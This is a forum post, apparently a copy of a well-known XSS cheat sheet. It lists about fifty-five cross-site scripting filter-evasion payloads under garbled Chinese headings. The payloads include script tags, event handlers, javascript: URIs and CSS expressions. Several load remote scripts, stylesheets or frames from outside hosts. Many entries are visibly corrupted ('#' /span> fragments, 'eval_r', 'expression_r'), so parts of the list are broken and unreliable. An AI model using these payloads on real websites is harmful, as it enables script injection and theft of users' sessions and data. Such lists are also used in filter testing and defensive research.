admin 2016-4-28 10:06:15

XSS

(1)ͨXSS JavaScriptע
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(99)൯
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2)IMGǩXSSʹJavaScript
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMGǩ޷ֺ
<IMG SRC=javascript:alert(XSS)>

(4)IMGǩСд
<IMG SRC=JaVaScRiPt:alert(XSS)>

(5)HTML(зֺ)
<IMG SRC=javascript:alert(XSS)>

(6)ȱIMGǩ
<IMG "><SCRIPT>alert(XSS)</SCRIPT>>

(7)formCharCodeǩ()
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8Unicode()
<IMG SRC=jav..ʡ..S')>

(9)7λUTF-8Unicodeûзֺŵ()
<IMG SRC=jav..ʡ..S')>

(10)ʮƱҲûзֺ()
<IMG SRC=\'#\'" /span>

(11)Ƕʽǩ,Javascriptֿ
<IMG SRC=\'#\'" ascript:alert(XSS);>

(12)Ƕʽǩ,Javascriptֿ
<IMG SRC=\'#\'" ascript:alert(XSS);>

(13)Ƕʽз
<IMG SRC=\'#\'" ascript:alert(XSS);>

(14)Ƕʽس
<IMG SRC=\'#\'" ascript:alert(XSS);>

(15)ǶʽעJavaScript,XSS˵
<IMG SRC=\'#\'" /span>

(16)ַ(Ҫͬҳ)
<script>z=document.</script>
<script>z=z+write(</script>
<script>z=z+<script</script>
<script>z=z+ src=ht</script>
<script>z=z+tp://ww</script>
<script>z=z+w.shell</script>
<script>z=z+.net/1.</script>
<script>z=z+js></sc</script>
<script>z=z+ript>)</script>
<script>eval_r(z)</script>

(17)ַ
perl -e print <IMG SRC=java\0script:alert(\XSS\)>; > out

(18)ַ2,ַڹڻûЧ.Ϊûеط
perl -e print <SCR\0IPT>alert(\XSS\)</SCR\0IPT>; > out

(19)SpacesmetaǰIMGǩ
<IMG SRC=\'#\'" javascript:alert(XSS);>

(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js></SCRIPT>

(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(XSS)>

(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js></SCRIPT>

(23)˫
<<SCRIPT>alert(XSS);//<</SCRIPT>

(24)޽ű()
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)޽ű2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)뿪HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27)˫
<iframe src=http://3w.org/XSS.html <

(28)޵ ˫ ֺ
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29)˵JavaScript
\;alert(XSS);//

(30)Titleǩ
</TITLE><SCRIPT>alert(XSS);</SCRIPT>

(31)Input Image
<INPUT SRC=\'#\'" /span>

(32)BODY Image
<BODY BACKGROUND=javascript:alert(XSS)>

(33)BODYǩ
<BODY(XSS)>

(34)IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35)IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36)BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37)STYLE sheet
<LINK REL=stylesheet HREF=javascript:alert(XSS);>

(38)Զʽ
<LINK REL=stylesheet HREF=http://3w.org/xss.css>

(39)List-style-image(бʽ)
<STYLE>li {list-style-image: url(javascript:alert(XSS));}</STYLE><UL><LI>XSS

(40)IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41)METAurl
<META HTTP-EQUIV=refresh CONTENT=0; URL=http://;URL=javascript:alert(XSS);>

(42)Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43)Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44)Table
<TABLE BACKGROUND=javascript:alert(XSS)>

(45)TD
<TABLE><TD BACKGROUND=javascript:alert(XSS)>

(46)DIV background-image
<DIV STYLE=background-image: url(javascript:alert(XSS))>

(47)DIV background-image϶ַ(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE=background-image: url(javascript:alert(XSS))>

(48)DIV expression
<DIV STYLE=width: expression_r(alert(XSS));>

(49)STYLEԷֲ
<IMG STYLE=xss:expression_r(alert(XSS))>

(50)STYLE(:Ǻźһĸͷ)
<XSS STYLE=xss:expression_r(alert(XSS))>

(51)STYLE background-image
<STYLE>.XSS{background-image:url(javascript:alert(XSS));}</STYLE><A CLASS=XSS></A>

(52)IMG STYLEʽ
exppression(alert(XSS))>

(53)STYLE background
<STYLE><STYLE type=text/css>BODY{background:url(javascript:alert(XSS))}</STYLE>

(54)BASE
<BASE HREF=javascript:alert(XSS);//>

(55)EMBEDǩ,ǶFLASH,аXSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf ></EMBED>
ҳ: [1]
鿴汾: XSS